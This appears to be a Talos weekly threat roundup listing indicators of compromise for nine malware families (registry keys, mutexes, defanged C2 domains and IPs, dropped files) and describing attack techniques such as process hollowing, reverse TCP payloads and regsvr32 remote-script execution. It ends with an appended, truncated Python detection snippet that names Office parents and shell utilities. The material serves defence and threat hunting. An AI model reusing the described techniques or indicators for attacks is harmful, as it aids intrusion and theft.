Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 4 and June 11. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Dropper.Kovter-9868480-1 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.CoinMiner-9868311-1 | Dropper | This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog /blocking-cryptomining.
Win.Trojan.Dridex-9870190-0 | Trojan | Dridex is a well-known banking trojan that steals credentials and other sensitive information from an infected machine.
Win.Trojan.Scar-9868327-0 | Trojan | Scar will download and execute files to the system while spreading to other machines by copying itself to removable media.
Win.Packed.Zbot-9868422-0 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
Win.Dropper.LokiBot-9868454-0 | Dropper | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Trojan.Zegost-9869702-0 | Trojan | Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, thus significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.
Win.Packed.Redline-9869818-1 | Packed | Redline Stealer is an information-stealer written in .NET and sold on hacking forums.
Win.Downloader.Barys-9868878-0 | Downloader | This is a trojan and downloader that allows malicious actors to upload files to a victim's computer.

Threat Breakdown

Win.Dropper.Kovter-9868480-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 23
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 23
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 23
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
20
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0521341d
20
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0521341d
20
<HKCU>\SOFTWARE\FC6A75BE78 20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: bca7705c
20
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: bca7705c
20
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0905afc0
14
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0905afc0
14
<HKLM>\SOFTWARE\WOW6432NODE\92RXSFSFJC
Value Name: GzX9tmD
1
<HKLM>\SOFTWARE\WOW6432NODE\92RXSFSFJC
Value Name: 1Dwq8QmT1
1
<HKLM>\SOFTWARE\WOW6432NODE\633CEF3DB6BD7CED 1
<HKLM>\SOFTWARE\WOW6432NODE\DHOJZ0MOJ 1
<HKLM>\SOFTWARE\WOW6432NODE\633CEF3DB6BD7CED
Value Name: 52024FC3E38AF76E7B1
1
<HKLM>\SOFTWARE\WOW6432NODE\DHOJZ0MOJ
Value Name: 1BKtl3
1
<HKLM>\SOFTWARE\WOW6432NODE\DHOJZ0MOJ
Value Name: cEx8loD
1
<HKLM>\SOFTWARE\WOW6432NODE\77AF4C0D4B8135D8 1
<HKLM>\SOFTWARE\WOW6432NODE\AJ53QCT 1
<HKLM>\SOFTWARE\WOW6432NODE\77AF4C0D4B8135D8
Value Name: D858C9F7ABF0693F6
1
<HKLM>\SOFTWARE\WOW6432NODE\AJ53QCT
Value Name: D52zp4VIGZ
1
<HKLM>\SOFTWARE\WOW6432NODE\AJ53QCT
Value Name: sSDSVGnR
1
Mutexes | Occurrences
B8ED4D143840045A 21
6DD7DBFFCEB24BFD 21
Global\CD5FF936B43684FB 21
C59C87A31F74FB56 20
Global\42EDC1955FE17AD4 20
0D0D9BEBF5D08E7A 20
1315B41013857E19 20
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]copertini[.]pt 1
www[.]edisesuniversita[.]it 1
parking[.]beepdomains[.]co[.]uk 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Win.Dropper.CoinMiner-9868311-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
60[.]12[.]67[.]85 11
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
xcn1[.]yiluzhuanqian[.]com 11
Files and/or directories created | Occurrences
\TEMP\protect.exe 11
\protect.exe 11

File Hashes

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Win.Trojan.Dridex-9870190-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 18
Mutexes | Occurrences
{ac5b642b-c225-7367-a847-11bdf3a5e67c} 18
{24d07012-9955-711c-e323-1079ebcbe1f4} 18
{a2c9c140-d256-a4d5-6465-f62a6660f79e} 18
{a8af557b-6de9-c774-28f4-5c293f1b1769} 18
{b570fe85-587a-a133-ffc9-73821a57c0c1} 18
{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
Files and/or directories created | Occurrences
%System32%\Tasks\Ryddmbivo 18
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\WBpwM6IDv 1
%APPDATA%\Adobe\mxW 1
%APPDATA%\Adobe\Acrobat\hLkhSN9g8uN 1
%APPDATA%\Microsoft\InfoPath\1iFcU 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\A53bx7oKq 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ycSEvo1wA 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\FC2O6Fels 1
%APPDATA%\Adobe\ly1 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\W31CuSTJO 1
%APPDATA%\Microsoft\InfoPath\9JEMt 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Iswbc18VN 1
%APPDATA%\Microsoft\InfoPath\MEBjU 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Amf2eZ5b5 1
%APPDATA%\Adobe\Acrobat\aDDcUz 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ivF6pubCG 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\1k5tlHyVZ 1
%APPDATA%\Microsoft\InfoPath\CKdRc 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\6KLDSL7qR 1

File Hashes

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Win.Trojan.Scar-9868327-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Mutexes | Occurrences
wow64 21
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
walletwasabi[.]io 21
Files and/or directories created | Occurrences
%SystemRoot%\Tasks\wow64.job 23
%System32%\Tasks\wow64 21
%SystemRoot%\Tasks\hrknddrrhvhhhguulbk.job 1
%SystemRoot%\Tasks\gihevarpiuovorkibng.job 1
%SystemRoot%\Tasks\lqqrrsttuvwwxabbcdd.job 1
%SystemRoot%\Tasks\vlqopdoghjkvxkvnoqr.job 1
%SystemRoot%\Tasks\pwvolemfhbsgevewark.job 1
%SystemRoot%\Tasks\qbmacelnkntwegspmov.job 1
%SystemRoot%\Tasks\vqtshbjiquerbtdckow.job 1
%SystemRoot%\Tasks\erdfvxacnobneghjuwj.job 1
%SystemRoot%\TEMP\gghhh.exe 1
%SystemRoot%\Tasks\whiijjkllmmnnooppqq.job 1
%System32%\Tasks\erdfvxacnobneghjuwj 1
%System32%\Tasks\whiijjkllmmnnooppqq 1
%SystemRoot%\TEMP\foihq.exe 1
%SystemRoot%\Tasks\aivfxscuxdlfoigaoiq.job 1
%SystemRoot%\TEMP\kuheg.exe 1
%SystemRoot%\Tasks\gbgnbmnavnfqitvieum.job 1
%System32%\Tasks\aivfxscuxdlfoigaoiq 1
%System32%\Tasks\gbgnbmnavnfqitvieum 1
%SystemRoot%\TEMP\bitapu.exe 1
%SystemRoot%\Tasks\uoldccbgfjxewwvcbgt.job 1
%SystemRoot%\TEMP\ibkuqie.exe 1
%SystemRoot%\Tasks\dshucfdgjvfwuwujqjq.job 1
%System32%\Tasks\uoldccbgfjxewwvcbgt 1

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Win.Packed.Zbot-9868422-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 29 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {BE9CF6FF-9ACE-F848-60AC-C353D9C7DAA6}
7
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 7
<HKCU>\SOFTWARE\MICROSOFT\POOTAQ
Value Name: Evotxeu
1
<HKCU>\SOFTWARE\MICROSOFT\OHRO
Value Name: Efiphokaa
1
<HKCU>\SOFTWARE\MICROSOFT\NEBYU
Value Name: Coaqarra
1
<HKCU>\SOFTWARE\MICROSOFT\YSXI
Value Name: Radyq
1
<HKCU>\SOFTWARE\MICROSOFT\WYBU
Value Name: Udimert
1
<HKCU>\SOFTWARE\MICROSOFT\FIUS
Value Name: Tuofs
1
<HKCU>\SOFTWARE\MICROSOFT\PEYTAG
Value Name: Goaka
1
Mutexes | Occurrences
Local\{58888AD4-E6E5-1E5C-60AC-C353D9C7DAA6} 7
Local\{58888AD7-E6E6-1E5C-60AC-C353D9C7DAA6} 7
Local\{732EEFE6-83D7-35FA-60AC-C353D9C7DAA6} 7
Global\{5356DFE1-B3D0-1582-60AC-C353D9C7DAA6} 7
GLOBAL\{<random GUID>} 7
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
23[.]96[.]30[.]229 1
172[.]67[.]131[.]148 1
172[.]67[.]161[.]225 1
Files and/or directories created | Occurrences
%TEMP%\tmp<random, matching '[0-9a-z]{8}'>.bat 7
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 7
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 7
%APPDATA%\Doox\gaqy.ufa 1
%APPDATA%\Zuunqu\uqux.isi 1
%APPDATA%\Xouzti\raper.itb 1
%APPDATA%\Hoyb\okfi.zaq 1
%APPDATA%\Gyrau\iqmio.tuk 1
%APPDATA%\Hymine\emwus.dix 1
%APPDATA%\Yxeboh\toze.ywi 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Win.Dropper.LokiBot-9868454-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME 10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: DisplayName
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: UninstallString
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: DisplayIcon
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: Publisher
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: DisplayVersion
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Finalize
1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
data[.]biphysics[.]com 10
www[.]download-servers[.]com 10
77026[.]bodis[.]com 9
ww25[.]download-servers[.]com 9
ww16[.]download-servers[.]com 1
sstatic1[.]histats[.]com 1
Files and/or directories created | Occurrences
%APPDATA%\InstallW 10
%APPDATA%\InstallW\Full_Setup.exe 10
%APPDATA%\InstallW\Resume.exe 10
%APPDATA%\InstallW\Uninstall.exe 10
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 10
%TEMP%\nswCA1A.tmp\System.dll 1
%TEMP%\nswCA1A.tmp\WmiInspector.dll 1
%TEMP%\nswCA1A.tmp\inetc.dll 1
%TEMP%\nswCA1A.tmp\t1.dll 1
%TEMP%\nsv1001.tmp\IpConfig.dll 1
%TEMP%\nsv1001.tmp\WmiInspector.dll 1
%TEMP%\nsv1001.tmp\inetc.dll 1
%TEMP%\nsv1001.tmp\t1.dll 1
%TEMP%\nsv19C1.tmp\IpConfig.dll 1
%TEMP%\nsv19C1.tmp\WmiInspector.dll 1
%TEMP%\nsv19C1.tmp\inetc.dll 1
%TEMP%\nsv19C1.tmp\t1.dll 1
%TEMP%\nsv379D.tmp\IpConfig.dll 1
%TEMP%\nsv379D.tmp\WmiInspector.dll 1
%TEMP%\nsv379D.tmp\inetc.dll 1
%TEMP%\nsv379D.tmp\t1.dll 1
%TEMP%\nsp3387.tmp\IpConfig.dll 1
%TEMP%\nsp3387.tmp\WmiInspector.dll 1
%TEMP%\nsp3387.tmp\inetc.dll 1
%TEMP%\nsp3387.tmp\t1.dll 1

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Win.Trojan.Zegost-9869702-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Mutexes | Occurrences
216.99.150.253127.0.0.1127.0.0.1 2
192.168.1.102127.0.0.1127.0.0.1 1
123.53.111.15127.0.0.1127.0.0.1 1
zjzfzq.no-ip.orgzjzfzq.vicp.netzjzfzq.no-ip.org 1
Global\c8fc2141-c891-11eb-b5f8-00501e3ae7b6 1
zjzfzq.vicp.netwww.zjzfzq.comwww.zjzfzq.com 1
zhanghaor.xicp.net127.0.0.1127.0.0.1 1
Global\cef6b561-c891-11eb-b5f8-00501e3ae7b6 1
aaa.hk5586.cn127.0.0.1127.0.0.1 1
14.17.74.16214.17.74.16214.17.74.162 1
zjzfzq.vicp.netzjzfzq.vicp.netzjzfzq.f3322.net 1
183.18.143.152127.0.0.1127.0.0.1 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
45[.]119[.]125[.]223 3
112[.]90[.]135[.]151 2
216[.]99[.]150[.]253 2
123[.]53[.]111[.]15 1
14[.]17[.]74[.]162 1
183[.]18[.]143[.]152 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
ip[.]aa2[.]cn 3
ip[.]chinaz[.]com 2
ip[.]chinaz[.]com[.]wswebpic[.]com 2
Files and/or directories created | Occurrences
\$WinBackUP.H1409 11
\$WinBackUP.H1409\1 11
\$WinBackUP.H1409\1\tursafeoua.url 5
\$WinBackUP.H1409\uay.lnk 4
\$WinBackUP.H1409\wmg.inf 4
\$WinBackUP.H1409\dodnd.lnk 4
\$WinBackUP.H1409\dxdhh.url 4
\$WinBackUP.H1409\svchks.exe 4
\$WinBackUP.H1409\svchwo.exe 3
\$WinBackUP.H1409\sce.lnk 3
\$WinBackUP.H1409\uem.inf 3
\$WinBackUP.H1409\jhu.txt 3
\$WinBackUP.H1409\qddko.url 3
\$WinBackUP.H1409\kdddf.lnk 3
\$WinBackUP.H1409\sddus.url 3
\$WinBackUP.H1409\svchyc.exe 3
\$WinBackUP.H1409\wco.txt 3
\$WinBackUP.H1409\gddmu.url 3
\$WinBackUP.H1409\svchce.exe 3
\$WinBackUP.H1409\jrg.txt 3
\$WinBackUP.H1409\addtf.lnk 3
\$WinBackUP.H1409\1\tursafekao.url 3
\$WinBackUP.H1409\1\tursafeyuo.url 2
\$WinBackUP.H1409\dfdnl.url 2
\$WinBackUP.H1409\dsdbv.lnk 2

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Win.Packed.Redline-9869818-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Mutexes | Occurrences
serhershesrhsfesrf 7
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
api[.]ip[.]sb 12
spaceufx[.]site 11
api[.]ipify[.]org 7
api[.]ip[.]sb[.]cdn[.]cloudflare[.]net 7
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com 6
coronttegal[.]xyz 2
bukkva[.]site 1
Files and/or directories created | Occurrences
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 12
%ProgramData%\kaosdma.txt 7
%TEMP%\1622445233532.exe 1
%TEMP%\1622445233642.exe 1

File Hashes

Coverage

| Product | Protection |
|---|---|
| AMP | This has coverage |
| Cloudlock | N/A |
| CWS | This has coverage |
| Email Security | This has coverage |
| Network Security | This has coverage |
| Stealthwatch | N/A |
| Stealthwatch Cloud | N/A |
| Threat Grid | This has coverage |
| Umbrella | This has coverage |
| WSA | This has coverage |

[Figures: detection screenshots for AMP and ThreatGrid; MITRE ATT&CK technique map]

Win.Downloader.Barys-9868878-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
| IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences |
|---|---|
| 200[.]147[.]100[.]53 | 8 |
| 200[.]147[.]35[.]224 | 7 |
| 200[.]147[.]3[.]199 | 5 |
Domain Names contacted by malware. Does not indicate maliciousness
| Files and or directories created | Occurrences |
|---|---|
| \windy | 10 |
| \windy\Funcoes.dll | 10 |
| \windy\Avast.exe | 8 |
| \windy\Panda.exe | 8 |
| \windy\scmd.exe | 8 |
| \windy\Lsas.exe | 2 |
| \windy\bTray.exe | 2 |
| \windy\conhost.exe | 2 |

File Hashes


Coverage

| Product | Protection |
|---|---|
| AMP | This has coverage |
| Cloudlock | N/A |
| CWS | This has coverage |
| Email Security | This has coverage |
| Network Security | N/A |
| Stealthwatch | N/A |
| Stealthwatch Cloud | N/A |
| Threat Grid | This has coverage |
| Umbrella | N/A |
| WSA | N/A |

[Figures: detection screenshots for AMP and ThreatGrid; MITRE ATT&CK technique map]

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (14532)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (6733)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Trickbot malware detected - (6425)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Reverse TCP payload detected - (3031)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
Crystalbit-Apple DLL double hijack detected - (1625)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
A Microsoft Office process has started a Windows utility. - (715)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Kovter injection detected - (509)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application control bypass attempt detected. - (354)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
Dealply adware detected - (129)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Gamarue malware detected - (97)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
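
As an added example (not Talos or AMP code), the code below applies three of the behaviors described above to constructed process-creation events: an Office process starting a Windows utility, an excessively long PowerShell command line, and regsvr32.exe being pointed at remote script content. The event field names, the rule names and the 1000-character threshold are assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE_PARENTS = {"excel.exe", "winword.exe"}      # parents named in the post
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe"}  # children named in the post
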